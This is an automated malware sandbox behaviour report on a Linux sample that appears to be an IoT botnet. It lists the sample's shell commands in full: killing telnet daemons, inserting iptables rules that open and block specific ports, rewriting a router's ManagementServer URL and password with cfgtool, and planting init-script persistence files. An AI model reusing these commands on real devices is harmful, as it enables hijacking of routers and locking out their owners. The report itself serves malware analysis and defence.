Source: /usr/bin/killall (PID: 4604) File opened: /proc/2/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/3525/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/3/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/1346/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/3524/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/3524/cmdline Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/4/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/3523/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/5/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/7/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/8/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/9/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/20/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/21/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/22/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/23/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/24/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/25/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/28/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/29/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/1363/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/3541/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/3541/cmdline Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/1362/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/496/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/496/cmdline Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/30/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/31/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/31/cmdline Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/1119/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/3790/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/3791/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/3310/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/3431/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/3431/cmdline Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/3550/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/260/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/263/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/264/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/385/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/144/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/386/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/145/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/146/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/3546/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/3546/cmdline Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/147/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/3303/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/3545/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/148/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/149/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/3543/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/822/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/822/cmdline Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/3308/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/3308/cmdline Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/3429/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/3429/cmdline Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/47/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/48/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/48/cmdline Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/49/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/150/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/271/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/151/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/152/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/153/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/395/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/396/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/154/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/155/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/156/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/1017/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/157/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/158/stat Jump to behavior
Source: /usr/bin/killall (PID: 4604) File opened: /proc/159/stat Jump to behavior
Executes commands using a shell command-line interpreter
Source: /tmp/nT7K5GG5km (PID: 4602) Shell command executed: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr" Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4636) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 44040 -j ACCEPT" Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4670) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 44040 -j ACCEPT" Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4674) Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 44040 -j ACCEPT" Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4715) Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 44040 -j ACCEPT" Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4724) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 44040 -j ACCEPT" Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4750) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 44040 -j ACCEPT" Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4759) Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 44040 -j ACCEPT" Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4775) Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 44040 -j ACCEPT" Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4813) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP" Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4816) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP" Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4828) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP" Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4855) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP" Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4882) Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\"" Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4891) Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\"" Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4893) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP" Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4904) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP" Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4931) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP" Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4955) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP" Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4979) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP" Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4988) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP" Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 5005) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP" Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 5031) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP" Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 5057) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP" Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 5065) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP" Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 5085) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP" Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 5111) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP" Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 5137) Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --destination-port 8080 -j ACCEPT" Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 5149) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 8080 -j ACCEPT" Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 5160) Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 8080 -j ACCEPT" Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 5182) Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 8080 -j ACCEPT" Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 5210) Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --dport 8080 -j ACCEPT" Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 5219) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --sport 8080 -j ACCEPT" Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 5248) Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 8080 -j ACCEPT" Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 5257) Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 8080 -j ACCEPT" Jump to behavior
Executes the "iptables" command used for managing IP filtering and manipulation
Source: /bin/sh (PID: 4638) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 44040 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4672) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 44040 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4679) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 44040 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4720) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 44040 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4732) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 44040 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4755) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 44040 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4763) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 44040 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4785) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 44040 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 4815) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4819) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4838) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4866) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4896) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4915) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 4939) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 4966) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 4986) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 4992) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 5015) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 5042) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 5063) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP Jump to behavior
Source: /bin/sh (PID: 5071) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP Jump to behavior
Source: /bin/sh (PID: 5095) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 5119) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP Jump to behavior
Source: /bin/sh (PID: 5139) Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 8080 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5158) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 8080 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5167) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 8080 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5194) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 8080 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5215) Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --dport 8080 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5229) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 8080 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5253) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 8080 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5265) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 8080 -j ACCEPT Jump to behavior
Reads system information from the proc file system
Source: /tmp/nT7K5GG5km (PID: 4627) Reads from proc file: /proc/stat Jump to behavior
Sample tries to set the executable flag
Source: /tmp/nT7K5GG5km (PID: 4600) File: /usr/networks (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4600) File: /etc/rcS.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4600) File: /etc/init.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Writes ELF files to disk
Source: /tmp/nT7K5GG5km (PID: 4600) File written: /usr/networks Jump to dropped file
Writes shell script files to disk
Source: /tmp/nT7K5GG5km (PID: 4600) Shell script file created: /etc/rcS.d/S95baby.sh Jump to dropped file
Source: /tmp/nT7K5GG5km (PID: 4600) Shell script file created: /etc/init.d/S95baby.sh Jump to dropped file
Source: submitted sample Stderr: telnetd: no process foundutelnetd: no process foundscfgmgr: no process foundUnsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705/bin/sh: 1: cfgtool: not found/bin/sh: 1: cfgtool: not foundUnsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705: exit code = 0

Hooking and other Techniques for Hiding and Protection:

barindex
Drops files in suspicious directories
Source: /tmp/nT7K5GG5km (PID: 4600) File: /etc/init.d/S95baby.sh Jump to dropped file
Source: /tmp/nT7K5GG5km (PID: 4600) File: /etc/init.d/mountall.sh Jump to dropped file
Source: /tmp/nT7K5GG5km (PID: 4600) File: /etc/init.d/checkfs.sh Jump to dropped file
Source: /tmp/nT7K5GG5km (PID: 4600) File: /etc/init.d/umountnfs.sh Jump to dropped file
Source: /tmp/nT7K5GG5km (PID: 4600) File: /etc/init.d/mountkernfs.sh Jump to dropped file
Source: /tmp/nT7K5GG5km (PID: 4600) File: /etc/init.d/checkroot-bootclean.sh Jump to dropped file
Source: /tmp/nT7K5GG5km (PID: 4600) File: /etc/init.d/mountnfs-bootclean.sh Jump to dropped file
Source: /tmp/nT7K5GG5km (PID: 4600) File: /etc/init.d/bootmisc.sh Jump to dropped file
Source: /tmp/nT7K5GG5km (PID: 4600) File: /etc/init.d/checkroot.sh Jump to dropped file
Source: /tmp/nT7K5GG5km (PID: 4600) File: /etc/init.d/hwclock.sh Jump to dropped file
Source: /tmp/nT7K5GG5km (PID: 4600) File: /etc/init.d/hostname.sh Jump to dropped file
Source: /tmp/nT7K5GG5km (PID: 4600) File: /etc/init.d/mountdevsubfs.sh Jump to dropped file
Source: /tmp/nT7K5GG5km (PID: 4600) File: /etc/init.d/mountall-bootclean.sh Jump to dropped file
Source: /tmp/nT7K5GG5km (PID: 4600) File: /etc/init.d/mountnfs.sh Jump to dropped file
Source: /tmp/nT7K5GG5km (PID: 4600) File: /usr/bin/gettext.sh Jump to dropped file
Source: /tmp/nT7K5GG5km (PID: 4600) File: /usr/sbin/alsa-info.sh Jump to dropped file
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 52478 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 45994 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 45994 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 45994 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 45994 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 45994 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 45994 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 45994 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 53350 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 45994 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 54390 -> 49152
Source: unknown Network traffic detected: HTTP traffic on port 49152 -> 54390

Malware Analysis System Evasion:

barindex
Uses the "uname" system call to query kernel version information (possible evasion)
Source: /tmp/nT7K5GG5km (PID: 4587) Queries kernel information via 'uname': Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4600) Queries kernel information via 'uname': Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4623) Queries kernel information via 'uname': Jump to behavior
Source: /sbin/modprobe (PID: 4639) Queries kernel information via 'uname': Jump to behavior
Source: /usr/share/apport/apport-gtk (PID: 5330) Queries kernel information via 'uname': Jump to behavior
Source: /usr/share/apport/apport-gtk (PID: 5349) Queries kernel information via 'uname': Jump to behavior
Source: kvm-test-1-run.sh.8.dr Binary or memory string: ( $QEMU $qemu_args -m 512 -kernel $resdir/bzImage -append "$qemu_append $boot_args"; echo $? > $resdir/qemu-retval ) &
Source: functions.sh0.8.dr Binary or memory string: # Usually this will be one of